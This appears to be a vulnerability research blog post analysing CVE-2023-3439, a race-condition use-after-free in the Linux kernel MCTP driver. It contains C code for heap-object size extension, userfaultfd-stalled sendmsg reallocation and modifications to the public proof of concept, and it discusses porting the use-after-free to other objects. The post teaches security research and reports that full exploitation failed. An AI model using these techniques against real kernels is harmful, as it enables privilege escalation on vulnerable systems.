Exploit with VS- Labs. CVE-2023-3439: Analyzing UAF Vulnerability in Linux MCTP 

Exploit with VS- Labs. CVE-2023-3439: Analyzing UAF Vulnerability in Linux MCTP 

  In this blog post, we will analyze the UAF vulnerability in the Linux mctp component and possible exploitation scenarios in detail. We will show the necessary steps to prepare the analysis environment and target kernel. We also try to give new perspective to readers by touching on exploitation tricks such as UAF porting. 

ENVIRONMENT  

  1. QEMU (We will use Ubuntu 22.04 as the host OS, but you can also use others.)  
  1. CVE-2023-3439 POC Code (https://www.openwall.com/lists/oss-security/2023/07/02/1/1 
  1. Vulnerable Linux Kernel (https://mirrors.edge.kernel.org/pub/linux/kernel/v5.x/linux-5.17.5.tar.gz 
  1. Suitable Filesystem for Initial ramdisk (initrd)  

BUG INTRODUCTION

CVE-2023-3439 is a Race Condition-based Use After Free (UAF) vulnerability in the Linux kernel mctp component.   

In vulnerable kernel versions, the mdev->addrs object is freed when the mctp_unregister function is triggered. But this unregister function routine can be emulated using the pseudo terminal so that only mdev->addrs is freed without triggering the dev_put function. This causes a Use After Free on the object.  

We need to note the mctp_route_remove_dev and mctp_neigh_remove_dev functions. These functions clear all entries referring to the mctp device. After this cleaning, communication with the device is no longer possible because these device entries are checked within the mctp-related syscall routines.  

Here, the basic flow should be as follows to trigger Use After Free.   

While one of the two threads, running simultaneously, is trying to communicate with the mctp device via sendto, the other thread needs to trigger the unregister function using a pseudo-terminal to free the mdev->addrs object. But here, as can be expected, a race condition will occur. The thread communicating with the mctp device must pass the necessary sanity check conditions before the entries referencing the device are cleared.  

Since the race window is tight, userfaultfd would be a suitable primitive to stabilize the exploit and win the race.  

As soon as the thread communicating with the mctp device encounters a fault in syscall flow, the necessary sanity checks are completed because the userfault buffer we send with sendto is copied within the mctp_sendmsg function after the device-related checks we mentioned above.  

After the userfault is triggered, we can start the mctp_unregister function by closing the master tty file descriptor, so that sanity checks are bypassed and mdev->addrs object is freed.  

Although we completed the race condition, this method only works once. It will not be possible to communicate with the device again after the sendto call because of the check conditions mentioned previously. So even if we bypass the race condition, recommunication is impossible after route entries are cleared.  

We will touch on UAF size extending and possible paths in the exploitation section.   

Let’s look at the environment-related procedures first.  

SETTING UP  

As we mentioned in the environment section, we will use Ubuntu 22.04 as the host OS, but it is not necessary to use it or the 22.04 version. Any Linux environment where you can run QEMU will work.  

First, download the target vulnerable Linux kernel version 5.17.5. Then, compile the kernel with the necessary build configurations.  

These build configurations are essential for several reasons. They provide file transportation between the QEMU initrd filesystem and the host and allow access to the required files for exploitation under directories like /dev within the filesystem.  

After enabling the build configurations, we will cover key details about the initrd filesystem. In BusyBox filesystems, network and mount settings are usually manual, so we need to set up the network connection. We will need it in exploitation and to mount the necessary directories. But for now, let’s continue with these build configurations.  

You can enable them from the .config file or from the default config file under the /arch/x86/configs

directory. Let us look at these build configs.  

 

CONFIG_NET_9P=y  

CONFIG_NET_9P_DEBUG=n  

CONFIG_9P_FS=y  

CONFIG_9P_FS_POSIX_ACL=y  

CONFIG_9P_FS_SECURITY=y  

CONFIG_NET_9P_VIRTIO=y  

CONFIG_VIRTIO_PCI=y  

CONFIG_VIRTIO_BLK=y  

CONFIG_VIRTIO_BLK_SCSI=y  

CONFIG_VIRTIO_NET=y  

CONFIG_VIRTIO_CONSOLE=y  

CONFIG_HW_RANDOM_VIRTIO=y  

CONFIG_DRM_VIRTIO_GPU=y  

CONFIG_VIRTIO_PCI_LEGACY=y  

CONFIG_VIRTIO_BALLOON=y  

CONFIG_VIRTIO_INPUT=y  

CONFIG_CRYPTO_DEV_VIRTIO=y  

CONFIG_BALLOON_COMPACTION=y  

CONFIG_PCI=y  

CONFIG_PCI_HOST_GENERIC=y  

CONFIG_GDB_SCRIPTS=y  

CONFIG_DEBUG_INFO=y  

CONFIG_DEBUG_INFO_REDUCED=n  

CONFIG_DEBUG_INFO_SPLIT=n  

CONFIG_DEBUG_FS=y  

CONFIG_DEBUG_INFO_DWARF4=y  

CONFIG_DEBUG_INFO_BTF=y  

CONFIG_FRAME_POINTER=y  

CONFIG_DEVTMPFS=y  

CONFIG_DEVTMPFS_MOUNT=y  

CONFIG_MPTCP=y  

CONFIG_INET_MPTCP_DIAG=y  

CONFIG_MPTCP_IPV6=y  

CONFIG_CONFIGFS_FS=y  

CONFIG_SECURITYFS=y  

CONFIG_CMDLINE_BOOL=y  

CONFIG_MCTP=y  

CONFIG_MCTP_SERIAL=y  

CONFIG_UNIX98_PTYS=y  

CONFIG_USERFAULTFD=y  

The last four are very important for exploit. These are required to add the MCTP device to the kernel, communicate with the MCTP device, and use userfaultfd and pseudo-terminal.  

Other configs are for the environmental requirements we mentioned above. You can compile a second kernel with KASAN and have a chance to analyze the KASAN output of the bug. Sometimes, this is the easiest way to find the cache where the UAF occurs. And KASAN helps to determine the UAF cache in the exploitation part.  

The next step is the filesystem.  

We need a filesystem to run the custom-built vulnerable kernel in QEMU. It is possible to use the popular pwnkernel environment for this. But some changes need to be made. As we mentioned before, some settings need to be made manually in BusyBox systems. For this, we will modify the init file in the filesystem. The init file is the file the kernel runs after the boot process is completed; it contains the necessary settings for userland.  

We need to add these lines to the init file: 

 

test -x /usr/sbin/v86d && dev_exec="exec" || dev_exec="noexec"

mount -t devtmpfs -o $dev_exec,nosuid,mode=0755 udev /dev

mkdir /dev/pts

mount -t devpts devpts /dev/pts

ifconfig eth0 10.0.2.15 netmask 255.255.255.0

ip r add default via 10.0.2.10 dev eth0  

As you can see, these commands are to use the /dev directory and network connection. Thus, we have completed the last operation in the setup procedure.  

We have completed preparing the kernel and environment parts. Now it’s time to test it. Let’s build and run the POC code on the KASAN kernel and analyze the output.  

 [ 153.719234] ==================================================================

[ 153.720212] BUG: KASAN: use-after-free in mctp_local_output+0x1332/0x1b10

[ 153.720589] Read of size 1 at addr ffff88800a77e898 by task poc/114

…

…

...

[ 153.731162] The buggy address belongs to the object at ffff88800a77e898

[ 153.731162] which belongs to the cache kmalloc-8 of size 8

[ 153.731651] The buggy address is located 0 bytes inside of

[ 153.731651] 8-byte region [ffff88800a77e898, ffff88800a77e8a0)

…

…

[ 153.738379] =================================================================

We successfully triggered the bug and got the KASAN output. I’ve only shared some parts of the output to reduce confusion. The main issue we need to pay attention to here is that the UAF object belongs to the kmalloc-8 cache. At first, someone who sees this output may think that the bug will be difficult to reallocate, and the bug may be completely useless. But the case here is different. It is possible to increase the UAF size up to kmalloc-256 by adding new addresses.  

Now, let’s move on to the exploitation section and examine the UAF size extension and exploitation paths.  

EXPLOITATION

First, we need to examine the allocation code flow in the source code to understand whether the UAF size extension is possible or not. The mdev->addrs object is allocated under the mctp_rtm_newaddr function.  

As we can understand from the function name, this is an addressing function. A tmp_addrs is created as a middle value, then the content of the mdev->addrs object is copied to this tmp_addrs, then the tmp_addrs and mdev->addrs pointers are swapped, and the flow is completed.  

As can be seen in the code, kmalloc function does not take a static value for the allocation size; there is a dynamic allocation here. This means that if we can change the mdev->num_addrs parameter, we can also change the allocation size. Then, what exactly affects mdev->num_addrs?  

In fact, the main factor affecting the mdev->num_addrs is the mctp_rtm_newaddr function itself. The mctp_rtm_newaddr function increments the value of the mdev->num_addrs by one on each successful execution.  

So, if we want to increase the allocation size, we need to trigger the mctp_rtm_newaddr function continuously. What triggers the mctp_rtm_newaddr function?  

When we look at the cross references of the mctp_rtm_newaddr function to find the answer, we see only one result.  

This result means we must use the rtnetlink protocol to trigger the mctp_rtm_newaddr function. A rtnetlink message containing the RTM_NEWADDR type and the PF_MCTP (AF_MCTP) protocol will get us to our destination.  

Let’s look at implementing the rtnetlink call in the POC code.  

 

// till now, the route is prepared

// we have to prepare some new address

// well, netlink again then

struct ifaddrmsg genaddr = {0};

genaddr.ifa_family = AF_MCTP;

genaddr.ifa_index = ifindex;

netlink_init(&nlmsg, RTM_NEWADDR, 0, &genaddr, sizeof(struct ifaddrmsg));

uint8_t ifa_address = 18;

netlink_attr(&nlmsg, IFA_ADDRESS, &ifa_address, sizeof(uint8_t));

uint8_t ifa_local = 18;

netlink_attr(&nlmsg, IFA_LOCAL, &ifa_local, sizeof(uint8_t));

netlink_send(&nlmsg, rtnetlink_socket);

Here is the code block in POC that makes the rtnetlink call and triggers the mctp_rtm_newaddr function. But as we mentioned earlier, mctp_rtm_newaddr increments mdev->num_addrs by one on every successful execution. Because of that, we will need to make the rnetlink call more than once to increase the allocation size to more than one. Let’s add a little for loop

 

// we have to prepare some new address

// well, netlink again then

int cache_size = 246; // 246 is the max value

struct ifaddrmsg genaddr = {0};

genaddr.ifa_family = AF_MCTP;

genaddr.ifa_index = ifindex;

int ifa_address = 0, ifa_local = 0;

for (int i = 0; i < cache_size; i++) {

netlink_init(&nlmsg, RTM_NEWADDR, 0, &genaddr, sizeof(struct ifaddrmsg));

netlink_attr(&nlmsg, IFA_ADDRESS, &ifa_address, sizeof(uint8_t));

ifa_address++;

netlink_attr(&nlmsg, IFA_LOCAL, &ifa_local, sizeof(uint8_t));

ifa_local++;

netlink_send(&nlmsg, rtnetlink_socket);

}

We can quickly increase the UAF size with a small for loop. However, we have another issue that we should pay attention to here: how much can we increase the allocation size?  

There is a limit to that. Inside the mctp_rtm_newaddr, mctp_address_ok function is executed, and the return value is controlled. This function verifies that the value of addr->s_addr is between 7 and 255. And the value addr->s_addr is directly linked to mdev->num_addrs. That is, when mdev->num_addrs increases, the value of addr->s_addr increases linearly.   

That’s why we can trigger the mctp_rtm_newaddr function a maximum of 246 times.  

But this is enough value to move UAF object to kmalloc256 cache. We mainly do this because it is much more difficult to reallocate an object in kmalloc-8 cache stably. Why do we see kmalloc-8 in the KASAN output obtained with the original POC code? The mctp_rtm_newaddr function is triggered once with original POC code because the rtnetlink message is created only once in the original POC. That means kmalloc allocates one-byte space (mdev->num_addrs = 0 in first execution), and this is automatically wrapped to kmalloc-8.  

Thus, the UAF size extension is completed. Now it’s time for reallocation.  

We will use sendmsg (ancillary data buffer) and userfaultfd for reallocation. We will copy the userfault setup and fault handler functions used for winning the race in the POC code and make some changes to use these with also sendmsg. With that plan, we will obtain a stable reallocation by stopping the execution at memcpy_from_msg under netlink_sendmsg function. When using userfaultfd with sendmsg, our game plan is to allocate a memory space with MAP_PRIVATE and MAP_ANONYMOUS flags. Then we will send this memory area as iov_base to the sendmsg syscall, create a new thread, and check for any faulty conditions. When sendmsg syscall tries to read the data we sent with the above-mentioned memcpy_from_msg function, the kernel execution will be stopped, and the fault handler will be triggered. Thus, the sendmsg syscall will never return, and our reallocation memory will not be freed. That’s how we will make a successful reallocation.  

 Let’s look at the setup userfault and fault handler functions we will use for reallocation.  


void setup_uffd_reallocation()

{

struct uffdio_api uffd_api;

struct uffdio_register uffd_reg;

pagesize = sysconf(_SC_PAGE_SIZE);

printf("[?] Page Size (setup_uffd) = %d\n", page_size);

uffd2 = (int)syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

if (uffd2 < 0)

{

perror("userfaultfd");

exit(-1);

}

uffd_api.api = UFFD_API;

uffd_api.features = 0;

if (ioctl(uffd2, UFFDIO_API, &uffd_api) < 0)

{

perror("ioctl#1");

exit(-1);

}

uffd_addr2 = mmap(NULL, pagesize, PROT_READ | PROT_WRITE,

MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (uffd_addr2 == MAP_FAILED)

{

perror("mmap");

exit(-1);

}

uffd_reg.range.start = (unsigned long long)uffd_addr2;

uffd_reg.range.len = pagesize;

uffd_reg.mode = UFFDIO_REGISTER_MODE_MISSING;

if (ioctl(uffd2, UFFDIO_REGISTER, &uffd_reg) < 0)

{

perror("ioctl#2");

exit(-1);

}

/* Create a thread that will process the userfaultfd events */

pthread_t thr;

int s;

s = pthread_create(&thr, NULL, reallocation_fault_handler, NULL);

if (s != 0)

{

errno = s;

errExit("pthread_create");

}

printf("[+] userfaultfd2 is done\n");

} 

With the setup_uffd_reallocation function above, we allocate the memory and register this memory to userfaultfd. Then, we can create a thread and call the reallocation_fault_handler function. This function will be used to monitor possible faulty conditions in the infinite loop. Let’s also take a look at the reallocation_fault_handler function.  

 
void reallocation_fault_handler(void)

{

static struct uffd_msg msg; /* Data read from userfaultfd */

static char *page = NULL;

ssize_t nread;

for (;;)

{

struct pollfd pollfd;

int nready;

pollfd.fd = uffd2;

pollfd.events = POLLIN;

nready = poll(&pollfd, 1, -1);

nread = read(uffd2, &msg, sizeof(msg));

if (msg.arg.pagefault.flags & UFFD_PAGEFAULT_FLAG_WRITE)

{

// in fact we do not expect

errExit("WUT.. a write fault...?");

}

else

{

printf("[+] read fault trigger in sendmsg syscall\n");

//We should freeze kernel here to save the UAF 

while (1){}

return;

}

}

}

Our main purpose in the reallocation_fault_handler function is to constantly check for possible faulty conditions. We do not take any action after handling the fault on the reallocation case. We only try to stop the execution of the kernel and prevent reallocation memory from being freed. But in the other fault handler for the mctp device in the POC code, after a possible faulty condition, we realize that we have bypassed the sanity checks in the sendmsg syscall, and we trigger the function that closes the master pseudo terminal file descriptor (unerg_thread), freeing the mdev->addrs object. In other words, userfaultfd can be modified for different purposes and scenarios, as we mentioned above in the original userfaultfd handler in the POC code.  

We examined the userfaultfd setup and handler function needed in the reallocation process. Now let’s look at the init_reallocation and reallocation functions that will trigger the sendmsg call that performs the reallocation.  

 

//global variables

int sender_socket;

static char realloc_buffer[256] = {0};

```

```

int init_reallocation(void) {

struct cmsghdr *filler;

sender_socket = _socket(AF_NETLINK, SOCK_DGRAM, 0);

memset(realloc_buffer + 8, 'A', sizeof(realloc_buffer) - 8);

filler = (struct cmsghdr *) realloc_buffer;

filler->cmsg_len = sizeof(realloc_buffer);

//filler->cmsg_level = 0; // must be different than SOL_SOCKET (1) to skip check

return 0;

}

As you know, the most critical factor in the reallocation process is speed. In other words, we must allocate the freed memory space before different processes allocate it. For this reason, we prepare with the init_reallocation function before the sendmsg call to speed up the reallocation process. First, we open AF_NETLINK socket and assign it to the sender_socket, which is a global value. Here, we have another global variable: ralloc_buffer. This is actually the ancillary data buffer we mentioned earlier.  

The content of this buffer, which we will send with the sendmsg call, will be copied to the memory to be allocated. In other words, this buffer will replace the mdev->addrs object. The data we will write in will be used in flows where the mdev->addrs is used. That’s the main logic behind a successful reallocation. But there is another detail we should mention here – filler->cmsg_len. An ancillary data buffer is a sequence of cmsghdr structures with appended data. Because of that, while allocating the ancillary data buffer, these cmsghdr structures are controlled. To pass these controls successfully, filler->cmsg_len must be equal to buffer size (it should be 256 in this case because mdev->addrs object belongs to kmalloc-256), and filler->cmsg_level must be different from 1.  

This means that after reallocation, the first 8 bytes of our mdev->addrs object will have to be equal to 256. Otherwise, we cannot use the ancillary data buffer primitive. But we can arbitrarily write in the remaining 248 bytes (of course, we should also pay attention to filler->cmsg_level).  

That’s all for init_reallocation. Let’s continue with the reallocation function.  


void reallocation(void) {

struct msghdr mhdr;

// initialize msghdr

struct iovec iov = {.iov_base = uffd_addr2, .iov_len = 0x10};

memset(&mhdr, 0, sizeof(mhdr));

mhdr.msg_iov = &iov;

mhdr.msg_iovlen = 1;

mhdr.msg_control = (void *) realloc_buffer; // use the ancillary data buffer

mhdr.msg_controllen = sizeof(realloc_buffer);

_sendmsg(sender_socket, &mhdr, 0);

}

We prepared the message header structure (msghdr) that we will send with the sendmsg syscall within the reallocation function. In this structure, there is both the userfault memory (iov_base) that will cause execution to stop and the reallocation buffer (msg_control) that will replace the mdev->addrs object.  

The realloc_buffer we send with the msg.control parameter is copied to the ctl_buf (ancilary data buffer) with the copy_from_user function under the ____sys_sendmsg. Thus, reallocation is completed. Then the memcpy_from_msg function under the netlink_sendmsg tries to copy data from the uffd_addr2 (userfaultfd buffer) we sent with the iov_base parameter. This will trigger the userfault and stop the execution of the kernel. The reallocation is successfully completed.  

But where exactly do we need to trigger these functions in the POC code?  

We use four functions in the reallocation process: setup_uffd_reallocation, reallocation_fault_handler, init_reallocation, and reallocation. Except for the reallocation function, the others are designed to set up requirements before the exploit is triggered.   

So, we can trigger the other three functions inside the main function before triggering the exploit, but we should remember that reallocation_fault_handler is a function triggered by setup_uffd_reallocation. This means we need to trigger setup_uffd_reallocation and init_reallocation before triggering the exploit in the main function.   

But where exactly do we need to deploy the reallocation function in the POC code?  

We know the reallocation should happen right after the mdev->addrs object is freed. We mentioned at the beginning of the blog that the mctp_unregister function, which frees this object, is triggered after the userfault is triggered. This means that the function that frees the mdev->addrs object in the POC code is fault_handler_thread. Because the handler function of the uferfault setup for the mctp device is fault_handler_thread, let’s look at what the handler function does after the read fault is triggered.  


else

{

printf("[+] read fault trigger\n");

// this is what we expect

// sad thing: this close cannot easily return because the

// unreg will keep waiting for the cleanup of all the netdev refs

// hence we need a thread to do it

pthread_t thr;

pthread_create(&thr, NULL, unerg_thread, NULL);

// sleep to let another thread free the addr

sleep(4);

*(unsigned long int *)page = 0;

fault_cnt++;

uffdio_copy.src = (unsigned long)page;

uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address &

The fault_handler_thread function closes the master file descriptor and frees the mdev->addrs object immediately after the userfault is triggered. This is where we should deploy and trigger the reallocation function. After the unerg_thread function closes the master file descriptor, we should immediately call the reallocation function with a different thread. As a result, we have successfully implemented the reallocation flow into the POC code.  

Let’s modify the read fault handler block to implement reallocation.  

 

else

{

printf("[+] read fault trigger\n");

// this is what we expect

// sad thing: this close cannot easily return because the

// unreg will keep waiting for the cleanup of all the netdev refs

// hence we need a thread to do it

+printf("Start Unreg Thread!\n");

+pthread_t thr, thr2;

pthread_create(&thr, NULL, unerg_thread, NULL); //that thread will free the mdev->addrs

+printf("Unreg Thread Done!\n");

+sleep(1);

+printf("Start Reallocation!\n");

+pthread_create(&thr2, NULL, reallocation, NULL);// that thread will make reallocation

+printf("Reallocation Done!\n");

// sleep to let another thread free the addr

sleep(4);

You can see the read fault handler block I modified above. I put “+” at the beginning of the parts I added later to make it easier to understand. In addition, I took only the necessary parts from the code to avoid confusion.  

After this modification, the reallocation part is finished successfully. However, we need to mention a small detail. As you can see, we called the reallocation function not directly but by creating a new thread. We talked about the main reason for this before. We prepared a second userfault setup to keep the reallocation stable. In other words, the reallocation function is not a function that can return. The thread it is in will be stopped until the exploitation is finished. Because of this, we did not want the main exploit code to be stopped, so we called the reallocation function by creating a new thread.  

Now, it’s time to examine possible exploitation paths. But there is another detail that I want to mention first, which may be important for reallocation; sched_setaffinity.  

sched_setaffinity is a system call in Linux that allows you to set the CPU affinity of a process or thread. CPU affinity refers to the assignment of a process or thread to run on a specific CPU core or a set of CPU cores within a multi-core system.  

In multi-core systems, memory allocators can create CPU-specific caches. Thus, the memory space freed by a specific CPU core can only be allocated by that CPU core. This means the freeing operation and reallocation operation by different CPU cores may cause reallocation to fail.   

For this reason, we can use sched_setaffinity to make reallocation more stable and reliable. When the exploit starts, we can try to set the CPU affinity of the exploit process to run exclusively on CPU core 0 (0 here is an arbitrary value; optionally, a different core can be selected). This way, we get a more stable and reliable reallocation.  

To do this, we will add a custom function called set_cpu_core to the POC code. Let’s take a look at this function.  


int set_cpu_core(void)

{

cpu_set_t setter;

CPU_ZERO(&setter);

CPU_SET(0, &setter);

if (_sched_setaffinity(getpid(), sizeof(setter), &setter) == -1)

{

perror("sched_setaffinity");

return -1;

}

return 0;

}

With this function, we ensure that the exploit process runs specifically on CPU core 0. We prevent possible CPU core-related reallocation problems.  

But remember that reliable reallocation is a complex topic, and each target means a different problem.  

So, we successfully triggered the bug, then upgraded the mdev->addrs object from kmalloc-8 to kmalloc-256, made all the necessary setups for reallocation, and completed the reallocation. Now we have UAF with mdev->addrs object that we can write arbitrarily. And we can analyze possible exploitation paths.  

To find possible exploitation paths, we first need to determine where and how the mdev->addrs object is used.   

There are multiple ways to do this. We chose to use CodeQL. After writing a small CodeQL query, we found that the mdev->addrs object is used in 8 different places in the Linux Kernel (see that query at the end of the blog).  

Here is the list of the places: 

  1. kfree(mdev->addrs); under mctp_unregister function  
  1. pos = memchr(mdev->addrs, addr->s_addr, mdev->num_addrs); under mctp_rtm_deladdr function  
  1. memmove(pos, pos + 1, mdev->num_addrs – 1 – (pos – mdev->addrs)); under mctp_rtm_deladdr function  
  1. memchr(mdev->addrs, addr->s_addr, mdev->num_addrs) under mctp_rtm_newaddr function  
  1. memcpy(tmp_addrs, mdev->addrs, mdev->num_addrs); under mctp_rtm_newaddr function  
  1. swap(mdev->addrs, tmp_addrs); under mctp_rtm_newaddr function  
  1. rc = mctp_fill_addrinfo(skb, mdev, mdev->addrs[mcb->a_idx], RTM_NEWADDR, portid, seq, NLM_F_MULTI); under mctp_dump_dev_addrinfo function  
  1. saddr = rt->dev->addrs[0]; under mctp_local_output function  

Now, let’s review them and see how they use mdev->addrs.  

When we analyze kfree in Case 1, we see it is under the mctp_unregister function. If you remember beginning of the blog, this is the function we used to create the UAF and free the mdev->addrs object. We triggered the mctp_unregister function by closing the master file descriptor. If we want to re-trigger kfree, we will have to trigger the mctp_unregister function again, which does nothing to exploitation. So, Case 1 is useless for us.  

When we move on to Case 2, we encounter a memchr function. In this function, mdev->addrs object is used as a memory area to be scanned. It is impossible to consider it useful as it has no direct effect on mdev->addrs.  

In Case 3, we encounter a memmove function. The mdev->addrs object is treated only as a memory region. A memory movement operation is performed according to the difference between the pos value obtained from the previous case. Nothing stands out, so let’s continue to case 4.  

In Case 4, we are faced with the memchr function again. But that’s just a little sanity check. It is not useful.  

In Case 5, we encounter a more critical function compared to others: memcpy.  

This memcpy function is under the mctp_rtm_newaddr function (we mentioned the mctp_rtm_newaddr function in UAF size extension section). The main task of the memcpy function is to copy the contents of the mdev->addrs object to the intermediate object tmp_addrs with a larger size when we add a new address. Although it is a critical function, after the content of the mdev->addrs object we wrote arbitrarily is copied to the tmp_addrs object, it is assigned to the mdev->addrs object again with the swap function that we will see in the next case. In other words, we are overwriting the mdev->addrs object, not a different object. So, this is not what we need. Let’s continue to Case 6.  

Case 6 has the swap function that we just mentioned. When we add a new address, the size of the mdev->addrs object must increase. Because of this, a temporary tmp_addrs object is created and the pointers are swapped after the content copying process we mentioned above. So this will not work either.  

Before we move on to Case 7, there is a critical and important detail about the mctp_rtm_newaddr function that we need to mention.  

Although Case 5 and Case 6 in the mctp_rtm_newaddr function seem useless, the mctp_rtm_newaddr function is an excellent candidate for UAF porting. Let’s explain the idea behind the UAF porting.  

As we mentioned before, we upgraded the UAF size from kmalloc-8 to kmalloc-256. While doing this, we added 246 new addresses (remember, we can only add a maximum of 246 to pass the mctp_address_ok verification) and used mctp_rtm_newaddr function 246 times. Each time a new address is added, the temporary object tmp_addrs is freed with kfree after the content copying and swapping processes. The freed tmp_addrs here is the old and smaller size mdev->addrs object. In other words, the tmp_addrs is an object that acts as an intermediate variable to transfer the mdev->addrs to a larger memory area when a new address is added, and free the old mdev->addrs left behind after this transfer. So, this means if we can somehow replace the tmp_addrs with a useful target structure, we can free that structure and port the UAF.  

As we saw above, the usage areas of the mdev->addrs object are very limited. There doesn’t seem to be any way we can reach direct execution. The mdev->addrs object is just an integer pointer. Because of that, it may be a logical decision to move the UAF to a structure that contains function pointers and other useful objects. Here’s a way to do this. After adding 245 (We do not use the last one intentionally, after reallocation we will need it to trigger the mctp_rtm_newaddr function one last time and to be able to port the UAF) addresses and upgrading UAF size to kmalloc-256, reallocation should be done with a structure that contains objects that will be useful in the exploitation process. After this reallocation process, the address of the mdev->addrs object will be the same as the useful target structure address we use for reallocation (this is what we expect from reallocation). At this point, if we add one more new address, after content copying and swapping operations, a new address from kmalloc-256 cache will be assigned to mdev->addrs object with swap, and after swapping, the old memory of the mdev->addrs (the useful target structure) will be assigned to the tmp_addrs object. This means that kfree(tmp_addrs); at the end of the mctp_rtm_newaddr function will free the useful target structure we used for reallocation.  

Now, we will have successfully ported the UAF to a structure containing function pointers and useful objects. After a new reallocation with sendmsg, we may have access to new opportunities such as direct code execution or kernel address leak with the new structure.  

The structure, that UAF will be ported to, can be selected from the caches: kmalloc-32, kmalloc-64, kmalloc-96, kmalloc-128, kmalloc-192 or kmalloc-256. The required number of new addresses should be added to the mdev->addrs object depending on the selected structure. This way, the target structure and mdev->addrs can be kept in the same cache.  

Of course, the example we gave above is for a structure in kmalloc-256 cache, for instance, if you want to port UAF to a structure in kmalloc-64 cache. You can first add 63 addresses and then make reallocation with your target structure. Then, you can free your target structure with 64th address. Or you can add 60 addresses and do UAF porting with the 61st address. Since kmalloc automatically assigns all allocations larger than 32 to kmalloc-64 cache, it is up to you to use the values in this range.  

Now, we can continue with Case 7.  

Case 7 and Case 8 are the other two exploitation paths that can be used outside of UAF porting. We had three possible exploitation paths for this bug (at least, I found three).  

In Case 7, mctp_fill_addrinfo function tries to add value to IFA_LOCAL and IFA_ADDRESS attributes. Here, the attributes that will be added came from mdev->addrs object so that we can add an arbitrary value to the attributes. That may be a possible exploitation path, so we can add Case 7 to the list.  

When we come to the last Case, we encounter the line that the POC code uses to trigger the bug. Here, the value at index 0 of the mdev->addrs object is assigned to the saddr variable. After saddr is overwritten, it is used in the allocation process of the mctp_sk_key structure.  

The general purpose of this structure is to contain keys to match incoming packets with sockets or contexes. And it takes one of the lookup fields it uses from the saddr variable while searching for these keys. In other words, we can say that it uses saddr as a database to search for matching keys of incoming packets. Additionally, it doesn’t just use the saddr variable to search, there is another variable called peer_addr. We can also add Case 8 to the list as it will be a possible exploitation path. And now it’s time to take a look at the detail we mentioned at the beginning of the blog.  

Even if we win the race condition after triggering the bug, we only have 1 call shot. Because when the bug is triggered, and the mdev->addrs object is freed, all device entries are also cleared.  

This means we can only use one of the three ways we mentioned above in exploitation. But there is another problem that arises here. As we mentioned at the beginning of the blog, CVE-2023-3439 is a race condition based UAF. In other words, to get the UAF, we must first win the race. We use userfaultfd to win the race. But userfaultfd allows us to win the race in just one case we mentioned. And that’s saddr overwriting in Case 8. Unfortunately, other cases are not suitable to use userfaultfd.  

After this process, we do not have a chance to continue exploitation because what we have is very limited. In addition, we can only statically overwrite the saddr variable with the value at index 0 of the mdev->addrs object. To complete reallocation and bypass sanity checks, we need to set filler->cmsg_len to reallocation buffer length, corresponding to 0 index of mdev->addrs object. So, this means we can only overwrite saddr with limited values.  

Although that was not a successful exploitation attempt, we analyzed CVE-2023-3439 in depth and dealt with it from different aspects. We used userfaultfd for reallocation, analyzed the possible UAF porting scenario, and had the opportunity to look at the mctp subsystem.  

Finally, let’s look at the CodeQL query we used to find the places where the mdev->addrs object is used and end the blog.  

import cpp

from PointerFieldAccess ptr

where ptr.getTarget().getEnclosingElement().(Struct).getName().indexOf("mctp_dev") != -1

and ptr.toString().matches("addrs")

select ptr.getLocation()

CodeQL is a very powerful tool for static analysis. It can be very useful, especially when doing vulnerability research.   

Using the PointerFieldAccess class, we first indicate to CodeQL that we want to select all access elements that are struct mctp_dev pointer.  

Then, we specify that we want to choose the ones that point to addrs variable among these pointer accesses.  

Finally, we use the getLocation function to see the lines of code that match the filters above. This gives us eight results that we mentioned before.  

Analyzing UAF Vulnerability in Linux

CONCLUSION  

A detailed analysis of CVE-2023-3439 is provided in this blog post. It is prepared to provide detailed information about environment preparation, bug triggering, reallocation, and possible exploitation paths. Besides other exploitation paths, we also mentioned UAF porting in the exploitation section and tried to create new ideas for readers and expand their perspectives. Thank you for reading this blog. We aim to help others learn to perform security research.